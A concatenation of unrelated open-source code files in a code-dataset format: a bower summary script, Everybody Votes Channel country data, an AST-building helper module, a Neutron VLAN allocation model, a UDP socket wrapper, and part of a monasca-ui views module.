"""Gets the name of the tree-ish (branch, tag or commit)."""
if resolution['type'] == 'branch':
return resolution['branch']
if resolution['type'] in ('version', 'tag'):
return resolution['tag']
return resolution['commit']
def main():
for entry in sorted(os.listdir(DESTINATION_COMPONENTS_DIR)):
component_path = os.path.join(COMPONENTS_DIR, entry)
if not os.path.isdir(component_path):
continue
bower_path = os.path.join(component_path, '.bower.json')
if not os.path.isfile(bower_path):
raise Exception('%s is not a file.' % bower_path)
with open(bower_path) as stream:
info = json.load(stream)
PrintSummary(info)
if __name__ == '__main__':
main()
| bsd-3-clause | -7,055,168,873,998,143,000 | 25.934426 | 79 | 0.666464 | false | 3.503198 | false | false | false |
RiiConnect24/File-Maker | Channels/Everybody_Votes_Channel/voteslists.py | 1 | 10385 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import collections
"""List of countries the EVC uses."""
countries = collections.OrderedDict()
countries["Japan"] = ["日本", "Japan", "Japan", "Japon", "Japón", "Giappone", "Japan"]
countries["Argentina"] = ["アルゼンチン", "Argentina", "Argentinien", "Argentine", "Argentina", "Argentina", "Argentinië"]
countries["Brazil"] = ["ブラジル", "Brazil", "Brasilien", "Brésil", "Brasil", "Brasile", "Brazilië"]
countries["Canada"] = ["カナダ", "Canada", "Kanada", "Canada", "Canadá", "Canada", "Canada"]
countries["Chile"] = ["チリ", "Chile", "Chile", "Chili", "Chile", "Cile", "Chili"]
countries["Colombia"] = ["コロンビア", "Colombia", "Kolumbien", "Colombie", "Colombia", "Colombia", "Colombia"]
countries["Costa Rica"] = ["コスタリカ", "Costa Rica", "Costa Rica", "Costa Rica", "Costa Rica", "Costa Rica", "Costa Rica"]
countries["Ecuador"] = ["エクアドル", "Ecuador", "Ecuador", "Equateur", "Ecuador", "Ecuador", "Ecuador"]
countries["Guatemala"] = ["グアテマラ", "Guatemala", "Guatemala", "Guatemala", "Guatemala", "Guatemala", "Guatemala"]
countries["Mexico"] = ["メキシコ", "Mexico", "Mexiko", "Mexique", "México", "Messico", "Mexico"]
countries["Panama"] = ["パナマ", "Panama", "Panama", "Panama", "Panamá", "Panamá", "Panama"]
countries["Peru"] = ["ペルー", "Peru", "Peru", "Pérou", "Perú", "Perù", "Peru"]
countries["United States"] = ["アメリカ", "United States", "Vereinigte Staaten", "Etats-Unis d’Amérique", "Estados Unidos de América", "Stati Uniti d'America", "Verenigde Staten"]
countries["Venezuela"] = ["ベネズエラ", "Venezuela", "Venezuela", "Venezuela", "Venezuela", "Venezuela", "Venezuela"]
countries["Australia"] = ["オーストラリア", "Australia", "Australien", "Australie", "Australia", "Australia", "Australië"]
countries["Austria"] = ["オーストリア", "Austria", "Österreich", "Autriche", "Austria", "Austria", "Oostenrijk"]
countries["Belgium"] = ["ベルギー", "Belgium", "Belgien", "Belgique", "Bélgica", "Belgio", "België"]
countries["Denmark"] = ["デンマーク", "Denmark", "Dänemark", "Danemark", "Dinamarca", "Danimarca", "Denemarken"]
countries["Finland"] = ["フィンランド", "Finland", "Finnland", "Finlande", "Finlandia", "Finlandia", "Finland"]
countries["France"] = ["フランス", "France", "Frankreich", "France", "Francia", "Francia", "Frankrijk"]
countries["Germany"] = ["ドイツ", "Germany", "Deutschland", "Allemagne", "Alemania", "Germania", "Duitsland"]
countries["Greece"] = ["ギリシャ", "Greece", "Griechenland", "Grèce", "Grecia", "Grecia", "Griekenland"]
countries["Ireland"] = ["アイルランド", "Ireland", "Irland", "Irlande", "Irlanda", "Irlanda", "Ierland"]
countries["Italy"] = ["イタリア", "Italy", "Italien", "Italie", "Italia", "Italia", "Italië"]
countries["Luxembourg"] = ["ルクセンブルク", "Luxembourg", "Luxemburg", "Luxembourg", "Luxemburgo", "Lussemburgo", "Luxemburg"]
countries["Netherlands"] = ["オランダ", "Netherlands", "Niederlande", "Pays-Bas", "Países Bajos", "Paesi Bassi", "Nederland"]
countries["New Zealand"] = ["ニュージーランド", "New Zealand", "Neuseeland", "Nouvelle-Zélande", "Nueva Zelanda", "Nuova Zelanda", "Nieuw-Zeeland"]
countries["Norway"] = ["ノルウェー", "Norway", "Norwegen", "Norvège", "Noruega", "Norvegia", "Noorwegen"]
countries["Poland"] = ["ポーランド", "Poland", "Polen", "Pologne", "Polonia", "Polonia", "Polen"]
countries["Portugal"] = ["ポルトガル", "Portugal", "Portugal", "Portugal", "Portugal", "Portogallo", "Portugal"]
countries["Spain"] = ["スペイン", "Spain", "Spanien", "Espagne", "España", "Spagna", "Spanje"]
countries["Sweden"] = ["スウェーデン", "Sweden", "Schweden", "Suède", "Suecia", "Svezia", "Zweden"]
countries["Switzerland"] = ["スイス", "Switzerland", "Schweiz", "Suisse", "Suiza", "Svizzera", "Zwitserland"]
countries["United Kingdom"] = ["イギリス", "United Kingdom", "Großbritannien", "Royaume-Uni", "Reino Unido", "Regno Unito", "Verenigd Koninkrijk"]
"""List of country codes."""
country_codes = [1, 10, 16, 18, 20, 21, 22, 25, 30, 36, 40, 42, 49, 52, 65, 66, 67, 74, 76, 77, 78, 79, 82, 83, 88, 94, 95, 96, 97, 98, 105, 107, 108, 110]
"""These lists tell the script how many entries are used for the position tables."""
"""(if it's more than 1, that must mean the region is split up into multiple parts)"""
position_table = collections.OrderedDict()
position_table[1] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2]
position_table[16] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1]
position_table[18] = [1, 1, 2, 1, 1, 3, 1, 1, 1, 1, 1, 4, 3]
position_table[21] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0]
position_table[36] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[40] = [2, 0, 1, 1, 1, 0, 0, 1, 1, 2]
position_table[49] = [1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[77] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0]
position_table[78] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[83] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[94] = [1, 1, 1, 3, 1, 1, 1, 1, 1, 2, 1, 1]
position_table[105] = [1, 1, 1, 1, 3, 5, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[110] = [1, 2, 2, 1, 1]
"""Data for the position table. Nintendo mixed these up to match the order votes were submitted in (I think)."""
"""That would be more effort to re-arrange the data in the position table, so I just made it read the values only if there is any votes for the region."""
position_data = collections.OrderedDict()
position_data[1] = "A2A4C828AF52B964B478AA64AA73AA87AD9BA5969B96A09EADA5A2A987947F8E78A096A5919B9B8782A591AF82AF7AB978AA6EAA6DB364AF73B96BC05AA546AA55AF4BB437B95FC358BA46C350C82DBE26C623CD2DD237C837D728E14849395A"
position_data[16] = "A4862664E8648E1E4141C873D746CD9E7DA0B4467878B99B8746E35385BEC855C2AEE94D82DC4B6996C8A5AAE3699687E15AA064"
position_data[18] = "87BE3CA009981EA064AAC8C3F0A8E1AAC89BD7C3D4BDAAAA50AF1E695C405649505A3C787841647D8E89"
position_data[21] = "7C7D78739BC8695AAA5A71247D468D6B6E6E579887326946969BC896649B9119782D8C8C4BA58D4864B2677B647328194E19875A733E6E825A87"
position_data[36] = "37508FB0786914465A5A69A54B7D98B69B9E8AAF9687E6A07DAF82918C787DA2649B91B476988BA1EBAA5F7D8CBE91A52B6F67B2A5C8C8C899AE738CC8B9D7B4"
position_data[40] = "A05DAF7B1E7373737D5A739BAA5250823AA0"
position_data[49] = "D25E78D252E748E1AA87917D3C7819645A64E04EDC5FC8A0BE872EE628DF18D98C5A3C46A064AA5F7869B46C9191E249DC64EB37A53FAF5087419169A08C5037D2737337735AE440DC55557D2D5AD746E254B95D7D7D2341CD55E84CC87D714BAA7878914164CD69DC3F272F9B46C3645550F0BE"
position_data[77] = "8246DC465AB49196463CA06E28467864AA46E6E6C86E6E3296C87896C84678C88C14505A8C2D508CC8C8BE96"
position_data[78] = "B95A64966EDC9BC8C86E5F417837AF2D7350467841AA3CBEBE919664781E8C8C"
position_data[83] = "7D822328283C324B463264196432821E64466464786E82649682A08CA0A0BE96B9AABEBE96E63CB4"
position_data[94] = "645AC8418C6496288214B40AAA82D223BE08A0C882B4B46E32C8788232C8"
position_data[105] = "6E5F64E6A03C3C1EF852E65FCA739AD9A7E6B4E1C8E6EBE1641E7878503CC832AA73468C1E32A0968C28781E7832"
position_data[110] = "B4B4738732E67846D71E82B4507D"
"""Number of regions for each country."""
region_number = collections.OrderedDict()
region_number[1] = 47
region_number[10] = 24
region_number[16] = 27
region_number[18] = 13
region_number[20] = 13
region_number[21] = 33
region_number[22] = 7
region_number[25] = 22
region_number[30] = 22
region_number[36] = 32
region_number[40] = 10
region_number[42] = 25
region_number[49] = 52
region_number[52] = 25
region_number[65] = 8
region_number[66] = 9
region_number[67] = 3
region_number[74] = 17
region_number[76] = 6
region_number[77] = 26
region_number[78] = 16
region_number[79] = 13
region_number[82] = 8
region_number[83] = 20
region_number[88] = 3
region_number[94] = 12
region_number[95] = 13
region_number[96] = 5
region_number[97] = 16
region_number[98] = 7
region_number[105] = 17
region_number[107] = 21
region_number[108] = 23
region_number[110] = 5
language_num = collections.OrderedDict()
language_num[0] = "Japanese"
language_num[1] = "English"
language_num[2] = "German"
language_num[3] = "French"
language_num[4] = "Spanish"
language_num[5] = "Italian"
language_num[6] = "Dutch"
language_num[7] = "Portuguese"
language_num[8] = "French Canada"
"""Languages each country uses. The numbers correspond to the ones in the dictionary above."""
country_language = collections.OrderedDict()
country_language[1] = [1]
country_language[10] = [1, 4, 8]
country_language[16] = [1, 4, 7, 8]
country_language[18] = [1, 4, 8]
country_language[20] = [1, 4, 8]
country_language[21] = [1, 4, 8]
country_language[22] = [1, 4, 8]
country_language[25] = [1, 4, 8]
country_language[30] = [1, 4, 8]
country_language[36] = [1, 4, 8]
country_language[40] = [1, 4, 8]
country_language[42] = [1, 4, 8]
country_language[49] = [1, 4, 8]
country_language[52] = [1, 4, 8]
country_language[65] = [1]
country_language[66] = [2, 3, 5, 6]
country_language[67] = [2, 3, 5, 6]
country_language[74] = [1]
country_language[76] = [1]
country_language[77] = [3]
country_language[78] = [2]
country_language[79] = [1, 4, 7]
country_language[82] = [1]
country_language[83] = [5]
country_language[88] = [2, 3, 5, 6]
country_language[94] = [6]
country_language[95] = [1]
country_language[96] = [1]
country_language[97] = [1]
country_language[98] = [1, 4, 7]
country_language[105] = [4]
country_language[107] = [1]
country_language[108] = [2, 3, 5, 6]
country_language[110] = [1]
category_text = collections.OrderedDict()
category_text[0] = "Thoughts"
category_text[1] = "Personality"
category_text[2] = "Surroundings"
category_text[3] = "Experience"
category_text[4] = "Knowledge"
"""Poll categories. The keys correspond to the ones above."""
categories = collections.OrderedDict()
categories[0] = 3
categories[1] = 5
categories[2] = 7
categories[3] = 9
categories[4] = 10
| agpl-3.0 | -2,446,450,334,709,106,700 | 51.046632 | 254 | 0.676755 | false | 2.138144 | false | false | false |
ztane/Tonnikala | tonnikala/astutil/__init__.py | 1 | 7620 | import ast
NoneValue = object()
mappednames = [
False,
True,
NotImplemented,
Ellipsis
]
try:
basestring
except:
basestring = (str, bytes)
numbers = (int, float)
def coerce(obj):
if any(i is obj for i in mappednames):
return Name(str(obj))
if obj is NoneValue:
return Name('None')
if isinstance(obj, basestring):
return Str(obj)
if isinstance(obj, numbers):
return Num(obj)
if isinstance(obj, list):
return List(obj)
if isinstance(obj, dict):
return Dict(obj)
if isinstance(obj, tuple):
return Tuple(obj)
return obj
def coerce_list(obj):
return [ coerce(i) for i in obj ]
def coerce_dict(obj, valuesonly=False):
kcoerce = coerce
if valuesonly:
kcoerce = lambda x: x
return { kcoerce(k): coerce(v) for (k, v) in obj.items() }
def maybe_ast(obj):
if obj is None:
return
return obj._get_ast()
def _get_list_ast(obj):
return [ i._get_ast() for i in obj ]
class AstNode(object):
def _make_lvalue(self):
raise TypeError("Cannot make an lvalue of %s (non-expression)" % self.__class__.__name__)
class Expression(AstNode):
def __call__(self, *a, **kw):
return Call(self, *a, **kw)
def _assign(self, value):
return Assign(self, value)
def __getattr__(self, name):
return Attribute(self, name)
def _make_lvalue(self):
raise TypeError("Cannot make an lvalue of %s" % self.__class__.__name__)
class Statement(AstNode):
pass
def make_statement(node):
if isinstance(node, Expression):
return Expr(node)
return node
class Expr(Statement):
def __init__(self, value):
self.value = coerce(value)
def _get_ast(self):
return ast.Expr(self.value._get_ast())
class Num(Expression):
def __init__(self, n=None):
self.n = n
def _get_ast(self):
return ast.Num(self.n)
class Str(Expression):
def __init__(self, s=None):
self.s = s
def _get_ast(self):
return ast.Str(s=self.s)
class Assign(Statement):
def __init__(self, target, source):
self.target = target._make_lvalue()
self.source = coerce(source)
def _get_ast(self):
return ast.Assign(
[ self.target._get_ast() ],
self.source._get_ast()
)
class Call(Expression):
def __init__(self, func, *a, **kw):
self.func = func
self.a = None
self.kw = None
if '_kwargs' in kw:
self.kw = coerce_dict(kw.pop('_kwargs'))
if '_args' in kw:
self.a = coerce_list(kw.pop('_args'))
self.args = coerce_list(a)
self.kwargs = coerce_dict(kw, valuesonly=True)
def _get_ast(self):
kwlist = []
for k, v in self.kwargs.items():
kwlist.append(ast.keyword(
arg=k,
value=v._get_ast()
))
return ast.Call(
func=self.func._get_ast(),
args=_get_list_ast(self.args),
keywords=kwlist,
starargs=maybe_ast(self.a),
kwargs=maybe_ast(self.a)
)
ctx_type_to_factory = {
'load': ast.Load,
'store': ast.Store
}
class Name(Expression):
def __init__(self, id=None, ctx='load'):
if not isinstance(id, str):
id = id.decode('UTF-8')
self.name = id
self.ctx = ctx
def _make_lvalue(self):
return Name(id=self.name, ctx='store')
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.Name(self.name, ctx)
class Attribute(Expression):
def __init__(self, value=None, attr=None, ctx='load'):
self.value = coerce(value)
self.attr = attr
self.ctx = ctx
def _make_lvalue(self):
return Attribute(self.value, self.attr, 'store')
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.Attribute(self.value._get_ast(), self.attr, ctx)
class Dict(Expression):
def __init__(self, value=None):
value = value or {}
keys = []
values = []
for k, v in value.items():
keys.append(k)
values.append(v)
self.keys = coerce_list(keys)
self.values = coerce_list(values)
def _get_ast(self):
return ast.Dict(_get_list_ast(self.keys), _get_list_ast(self.values))
class Tuple(Expression):
def __init__(self, value=None, ctx='load'):
value = list(value) or []
self.values = coerce_list(value)
self.ctx = ctx
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.Tuple(_get_list_ast(self.values), ctx)
def _make_lvalue(self):
return Tuple([ i._make_lvalue() for i in self.values ], 'store')
class List(Expression):
def __init__(self, value=None, ctx='load'):
value = value or []
self.values = coerce_list(value)
self.ctx = ctx
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.List(_get_list_ast(self.values), ctx)
def _make_lvalue(self):
return List([ i._make_lvalue() for i in self.values ], 'store')
try:
from collections.abc import MutableSequence
except ImportError:
from collections import MutableSequence
class StatementList(MutableSequence):
def __init__(self, initial=None):
self.list = []
if initial:
self += initial
def coerce(self, o):
return make_statement(o)
def __getitem__(self, i):
return self.list[i]
def __setitem__(self, i, v):
self.list[i] = self.coerce(v)
def __delitem__(self, i):
del self.list[i]
def __len__(self):
return len(self.list)
def insert(self, i, o):
return self.list.insert(i, self.coerce(o))
def __iadd__(self, value):
if isinstance(value, AstNode):
self.append(value)
else:
super(StatementList, self).__iadd__(value)
return self
class For(Statement):
def __init__(self, vars=None, iterable=None, body=[], orelse=[]):
self.body = StatementList(body)
self.orelse = StatementList(orelse)
self.vars = vars
self.iterable = coerce(iterable)
@property
def vars(self):
return self._vars
@vars.setter
def vars(self, value):
if value is not None:
value = coerce(value)._make_lvalue()
self._vars = value
def _get_ast(self):
return ast.For(
self._vars._get_ast(),
self.iterable._get_ast(),
_get_list_ast(self.body),
_get_list_ast(self.orelse)
)
class If(Statement):
def __init__(self, condition=None, body=[], orelse=[]):
self.body = StatementList(coerce_list(body))
self.orelse = StatementList(coerce_list(orelse))
self.condition = coerce(condition)
def _get_ast(self):
return ast.If(
self.condition._get_ast(),
_get_list_ast(self.body),
_get_list_ast(self.orelse)
)
class Return(Statement):
def __init__(self, expression=None):
self.expression = coerce(expression)
def _get_ast(self):
return ast.Return(self.expression._get_ast())
if __name__ == '__main__':
forri = For(Name('a'), [ 1, 2, 3 ])
forri.body += Name('print')(Name('a'))
iffi = If(True)
iffi.body += forri
tree = iffi._get_ast()
print(ast.dump(tree))
import astor
print(astor.codegen.to_source(tree))
| apache-2.0 | -4,026,238,387,926,721,500 | 21.280702 | 97 | 0.559449 | false | 3.485819 | false | false | false |
noironetworks/apic-ml2-driver | apic_ml2/neutron/db/l3out_vlan_allocation.py | 1 | 10929 | # Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
from six import moves
import sqlalchemy as sa
from neutron._i18n import _LE, _LI, _LW
from neutron.common import exceptions as exc
from neutron.db import api as db_api
from neutron.db import model_base
from neutron.plugins.common import constants as p_const
from neutron.plugins.common import utils as plugin_utils
from neutron.plugins.ml2.drivers import helpers
LOG = log.getLogger(__name__)
class L3OutVlanAllocation(model_base.BASEV2):
"""Represent allocation state of a vlan_id for the L3 out per VRF.
If allocated is False, the vlan_id is available for allocation.
If allocated is True, the vlan_id is in use.
When an allocation is released, if the vlan_id is inside the pool
described by network_vlan_ranges, then allocated is set to
False. If it is outside the pool, the record is deleted.
"""
__tablename__ = 'apic_ml2_l3out_vlan_allocation'
__table_args__ = (
sa.Index('apic_ml2_l3out_vlan_allocation_l3out_network_allocated',
'l3out_network', 'allocated'),
model_base.BASEV2.__table_args__,)
l3out_network = sa.Column(sa.String(64), nullable=False,
primary_key=True)
vrf = sa.Column(sa.String(64), nullable=False,
primary_key=False)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
class NoVlanAvailable(exc.ResourceExhausted):
message = _("Unable to allocate the vlan. "
"No vlan is available for %(l3out_network)s external network")
# inherit from SegmentTypeDriver to reuse the code to reserve/release
# vlan IDs from the pool
class L3outVlanAlloc(helpers.SegmentTypeDriver):
def __init__(self):
super(L3outVlanAlloc, self).__init__(L3OutVlanAllocation)
def _parse_vlan_ranges(self, ext_net_dict):
self.l3out_vlan_ranges = {}
for l3out_network in ext_net_dict.keys():
try:
ext_info = ext_net_dict.get(l3out_network)
vlan_ranges_str = ext_info.get('vlan_range')
if vlan_ranges_str:
vlan_ranges = vlan_ranges_str.strip().split(',')
for vlan_range_str in vlan_ranges:
vlan_min, vlan_max = vlan_range_str.strip().split(':')
vlan_range = (int(vlan_min), int(vlan_max))
plugin_utils.verify_vlan_range(vlan_range)
self.l3out_vlan_ranges.setdefault(
l3out_network, []).append(vlan_range)
except Exception:
LOG.exception(_LE("Failed to parse vlan_range for L3out %s"),
l3out_network)
LOG.info(_LI("L3out VLAN ranges: %s"), self.l3out_vlan_ranges)
def sync_vlan_allocations(self, ext_net_dict):
session = db_api.get_session()
self._parse_vlan_ranges(ext_net_dict)
with session.begin(subtransactions=True):
# get existing allocations for all L3 out networks
allocations = dict()
allocs = (session.query(L3OutVlanAllocation).
with_lockmode('update'))
for alloc in allocs:
if alloc.l3out_network not in allocations:
allocations[alloc.l3out_network] = set()
allocations[alloc.l3out_network].add(alloc)
# process vlan ranges for each configured l3out network
for (l3out_network,
vlan_ranges) in self.l3out_vlan_ranges.items():
# determine current configured allocatable vlans for
# this l3out network
vlan_ids = set()
for vlan_min, vlan_max in vlan_ranges:
vlan_ids |= set(moves.xrange(vlan_min, vlan_max + 1))
# remove from table unallocated vlans not currently
# allocatable
if l3out_network in allocations:
for alloc in allocations[l3out_network]:
try:
# see if vlan is allocatable
vlan_ids.remove(alloc.vlan_id)
except KeyError:
# it's not allocatable, so check if its allocated
if not alloc.allocated:
# it's not, so remove it from table
LOG.debug("Removing vlan %(vlan_id)s on "
"l3out network "
"%(l3out_network)s from pool",
{'vlan_id': alloc.vlan_id,
'l3out_network':
l3out_network})
session.delete(alloc)
del allocations[l3out_network]
# add missing allocatable vlans to table
for vlan_id in sorted(vlan_ids):
alloc = L3OutVlanAllocation(l3out_network=l3out_network,
vrf='',
vlan_id=vlan_id,
allocated=False)
session.add(alloc)
# remove from table unallocated vlans for any unconfigured
# l3out networks
for allocs in allocations.itervalues():
for alloc in allocs:
if not alloc.allocated:
LOG.debug("Removing vlan %(vlan_id)s on l3out "
"network %(l3out_network)s from pool",
{'vlan_id': alloc.vlan_id,
'l3out_network':
alloc.l3out_network})
session.delete(alloc)
def get_type(self):
return p_const.TYPE_VLAN
def reserve_vlan(self, l3out_network, vrf, vrf_tenant=None):
vrf_db = L3outVlanAlloc._get_vrf_name_db(vrf, vrf_tenant)
session = db_api.get_session()
with session.begin(subtransactions=True):
query = (session.query(L3OutVlanAllocation).
filter_by(l3out_network=l3out_network,
vrf=vrf_db))
count = query.update({"allocated": True})
if count:
LOG.debug("reserving vlan %(vlan_id)s for vrf "
"%(vrf)s on l3out network %(l3out_network)s from "
"pool. Totally %(count)s rows updated.",
{'vlan_id': query[0].vlan_id,
'vrf': vrf_db,
'l3out_network': l3out_network,
'count': count})
return query[0].vlan_id
# couldn't find this vrf, allocate vlan from the pool
# then update the vrf field
filters = {}
filters['l3out_network'] = l3out_network
alloc = self.allocate_partially_specified_segment(
session, **filters)
if not alloc:
raise NoVlanAvailable(l3out_network=l3out_network)
filters['vlan_id'] = alloc.vlan_id
query = (session.query(L3OutVlanAllocation).
filter_by(allocated=True, **filters))
count = query.update({"vrf": vrf_db})
if count:
LOG.debug("updating vrf %(vrf)s vlan "
"%(vlan_id)s on l3out network %(l3out_network)s to "
"pool. Totally %(count)s rows updated.",
{'vrf': vrf_db,
'vlan_id': alloc.vlan_id,
'l3out_network': l3out_network,
'count': count})
LOG.debug("reserving vlan %(vlan_id)s "
"on l3out network %(l3out_network)s from pool",
{'vlan_id': alloc.vlan_id,
'l3out_network': l3out_network})
return alloc.vlan_id
def release_vlan(self, l3out_network, vrf, vrf_tenant=None):
vrf_db = L3outVlanAlloc._get_vrf_name_db(vrf, vrf_tenant)
session = db_api.get_session()
with session.begin(subtransactions=True):
query = (session.query(L3OutVlanAllocation).
filter_by(l3out_network=l3out_network,
vrf=vrf_db))
count = query.update({"allocated": False})
if count:
LOG.debug("Releasing vlan %(vlan_id)s on l3out "
"network %(l3out_network)s to pool. "
"Totally %(count)s rows updated.",
{'vlan_id': query[0].vlan_id,
'l3out_network': l3out_network,
'count': count})
return
LOG.warning(_LW("No vlan_id found for vrf %(vrf)s on l3out "
"network %(l3out_network)s"),
{'vrf': vrf_db,
'l3out_network': l3out_network})
# None is returned if not found
@staticmethod
def get_vlan_allocated(l3out_network, vrf, vrf_tenant=None):
session = db_api.get_session()
query = (session.query(L3OutVlanAllocation).
filter_by(l3out_network=l3out_network,
vrf=L3outVlanAlloc._get_vrf_name_db(
vrf, vrf_tenant),
allocated=True))
if query.count() > 0:
return query[0].vlan_id
@staticmethod
def _get_vrf_name_db(vrf, vrf_tenant):
return vrf_tenant and ("%s/%s" % (vrf_tenant, vrf)) or vrf
def initialize(self):
return
def is_partial_segment(self, segment):
return True
def validate_provider_segment(self, segment):
return
def reserve_provider_segment(self, session, segment):
return
def allocate_tenant_segment(self, session):
return
def release_segment(self, session, segment):
return
| apache-2.0 | 1,540,721,351,962,109,700 | 42.027559 | 78 | 0.529875 | false | 4.274149 | false | false | false |
awalkaradi95moc/pfioh | pfioh/dgmsocket.py | 1 | 3029 | #!/usr/bin/env python3
#
# NAME
#
# dgmsocket class
#
# DESCRIPTION
#
# The 'dgmsocket' class provides a very simple wrapper the standard
# python socket API.
#
# More specifically, this class provides datagram socket services.
#
# HISTORY
#
# 25 March 2006
# o Initial development implementation
#
# 06 December 2011
# o Clean-up the socket communication
#
import socket
class C_dgmsocket :
#
# Member variables
#
# - Core variables
mstr_obj = 'C_dgmsocket' # name of object class
mstr_name = 'void' # name of object variable
m_id = -1 # id of agent
m_iter = 0 # current iteration in an
# arbitrary processing
# scheme
m_verbosity = 0 # debug related value for
# object
m_warnings = 0 # show warnings
# (and warnings level)
#
# - Class variables
m_dgmsocket = None
mstr_remoteHost = 'localhost'
m_port = 1701
#
# Methods
#
# Core methods - construct, initialise, id
def core_construct( self,
astr_obj = 'C_dgmsocket',
astr_name = 'void',
a_id = -1,
a_iter = 0,
a_verbosity = 0,
a_warnings = 0) :
self.mstr_obj = astr_obj
self.mstr_name = astr_name
self.m_id = a_id
self.m_iter = a_iter
self.m_verbosity = a_verbosity
self.m_warnings = a_warnings
def __str__(self):
print('mstr_obj\t\t= %s' % self.mstr_obj)
print('mstr_name\t\t= %s' % self.mstr_name)
print('m_id\t\t\t= %d' % self.m_id)
print('m_iter\t\t\t= %d' % self.m_iter)
print('m_verbosity\t\t= %d' % self.m_verbosity)
print('m_warnings\t\t= %d' % self.m_warnings)
return 'This class provides a *very* simple wrapper framework about datagram sockets.'
def __init__(self, astr_hostname = 'localhost', a_port = 1701):
self.core_construct()
self.mstr_remoteHost = astr_hostname
self.m_port = a_port
self.m_dgmsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def tx(self, str_payload):
self.m_dgmsocket.sendto(str_payload.encode(), (self.mstr_remoteHost, self.m_port))
def write(self, str_payload):
self.m_dgmsocket.sendto(str_payload.encode(), (self.mstr_remoteHost, self.m_port))
def close(self):
self.m_dgmsocket.close()
def flush(self):
pass
| mit | -1,144,093,641,679,235,300 | 31.923913 | 102 | 0.468141 | false | 3.734895 | false | false | false |
openstack/monasca-ui | monitoring/overview/views.py | 1 | 16561 | # Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import copy
import json
import logging
from django.conf import settings
from django.contrib import messages
from django import http
from django.http import HttpResponse
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _ # noqa
from django.views.decorators.csrf import csrf_exempt
from django.views import generic
from django.views.generic import TemplateView
from horizon import exceptions
from openstack_auth import utils as auth_utils
from openstack_dashboard import policy
import urllib
from monitoring.alarms import tables as alarm_tables
from monitoring import api
from monitoring.overview import constants
LOG = logging.getLogger(__name__)
STATUS_FA_ICON_MAP = {'btn-success': "fa-check",
'btn-danger': "fa-exclamation-triangle",
'btn-warning': "fa-exclamation",
'btn-default': "fa-question-circle"}
def get_icon(status):
return STATUS_FA_ICON_MAP.get(status, "fa-question-circle")
priorities = [
{'status': 'btn-success', 'severity': 'OK'},
{'status': 'btn-default', 'severity': 'UNDETERMINED'},
{'status': 'btn-warning', 'severity': 'LOW'},
{'status': 'btn-warning', 'severity': 'MEDIUM'},
{'status': 'btn-warning', 'severity': 'HIGH'},
{'status': 'btn-danger', 'severity': 'CRITICAL'},
]
index_by_severity = {d['severity']: i for i, d in enumerate(priorities)}
def get_dashboard_links(request):
#
# GRAFANA_LINKS is a list of dictionaries, but can either
# be a nested list of dictionaries indexed by project name
# (or '*'), or simply the list of links to display. This
# code is a bit more complicated as a result but will allow
# for backward compatibility and ensure existing installations
# that don't take advantage of project specific dashboard
# links are unaffected. The 'non_project_keys' are the
# expected dictionary keys for the list of dashboard links,
# so if we encounter one of those, we know we're supporting
# legacy/non-project specific behavior.
#
# See examples of both in local_settings.py
#
non_project_keys = {'fileName', 'title'}
try:
for project_link in settings.DASHBOARDS:
key = list(project_link)[0]
value = list(project_link.values())[0]
if key in non_project_keys:
#
# we're not indexed by project, just return
# the whole list.
#
return settings.DASHBOARDS
elif key == request.user.project_name:
#
# we match this project, return the project
# specific links.
#
return value
elif key == '*':
#
# this is a global setting, squirrel it away
# in case we exhaust the list without a project
# match
#
return value
return settings.DEFAULT_LINKS
except Exception:
LOG.warning("Failed to parse dashboard links by project, returning defaults.")
pass
#
# Extra safety here -- should have got a match somewhere above,
# but fall back to defaults.
#
return settings.DASHBOARDS
def get_monitoring_services(request):
#
